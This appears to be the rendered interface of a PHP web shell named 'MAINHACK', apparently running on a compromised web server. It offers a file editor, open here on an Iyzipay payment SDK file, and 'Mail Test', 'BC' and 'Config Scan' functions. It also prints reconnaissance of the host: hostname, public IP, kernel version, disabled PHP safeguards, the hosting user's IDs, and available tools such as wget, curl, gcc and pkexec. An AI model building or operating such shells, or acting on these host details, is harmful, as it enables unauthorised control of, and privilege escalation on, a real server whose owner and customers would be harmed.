[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: IyzipayResource.php
<?php namespace Iyzipay; class IyzipayResource extends ApiResource { private $status; private $errorCode; private $errorMessage; private $errorGroup; private $locale; private $systemTime; private $conversationId; protected static function getHttpHeaders(Request $request, Options $options) { $header = array( "Accept: application/json", "Content-type: application/json", ); $rnd = uniqid(); array_push($header, "Authorization: " . self::prepareAuthorizationString($request, $options, $rnd)); array_push($header, "x-iyzi-rnd: " . $rnd); array_push($header, "x-iyzi-client-version: " . "iyzipay-php-2.0.58"); return $header; } protected static function getHttpHeadersV2($uri, Request $request = null, Options $options, bool $addRandom = false) { $header = array( "Accept: application/json", "Content-type: application/json", ); $rnd = uniqid(); array_push($header, "Authorization: " . self::prepareAuthorizationStringV2($uri, $request, $options, $rnd)); $addRandom && array_push($header, "x-iyzi-rnd: " . $rnd); array_push($header, "AUTHORIZATION_FALLBACK_HEADER: " . self::prepareAuthorizationString($request, $options, $rnd)); array_push($header, "x-iyzi-client-version: " . "iyzipay-php-2.0.58"); return $header; } protected static function getHttpHeadersIsV2($uri, Request $request = null, Options $options, bool $addRandom = false) { $header = array( "Accept: application/json", "Content-type: application/json", ); $rnd = uniqid(); array_push($header, "Authorization: " . self::prepareAuthorizationStringV2($uri, $request, $options, $rnd)); $addRandom && array_push($header, "x-iyzi-rnd: " . $rnd); array_push($header, "x-iyzi-client-version: " . "iyzipay-php-2.0.58"); return $header; } protected static function prepareAuthorizationString($request, Options $options, $rnd) { $authContent = HashGenerator::generateHash($options->getApiKey(), $options->getSecretKey(), $rnd, $request); return vsprintf("IYZWS %s:%s", array($options->getApiKey(), $authContent)); } protected static function prepareAuthorizationStringV2($uri, Request $request = null, Options $options, $rnd) { $hash = IyziAuthV2Generator::generateAuthContent($uri, $options->getApiKey(), $options->getSecretKey(), $rnd, $request); return 'IYZWSv2' . ' ' . $hash; } public function getStatus() { return $this->status; } public function setStatus($status) { $this->status = $status; } public function getErrorCode() { return $this->errorCode; } public function setErrorCode($errorCode) { $this->errorCode = $errorCode; } public function getErrorMessage() { return $this->errorMessage; } public function setErrorMessage($errorMessage) { $this->errorMessage = $errorMessage; } public function getErrorGroup() { return $this->errorGroup; } public function setErrorGroup($errorGroup) { $this->errorGroup = $errorGroup; } public function getLocale() { return $this->locale; } public function setLocale($locale) { $this->locale = $locale; } public function getSystemTime() { return $this->systemTime; } public function setSystemTime($systemTime) { $this->systemTime = $systemTime; } public function getConversationId() { return $this->conversationId; } public function setConversationId($conversationId) { $this->conversationId = $conversationId; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.84 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002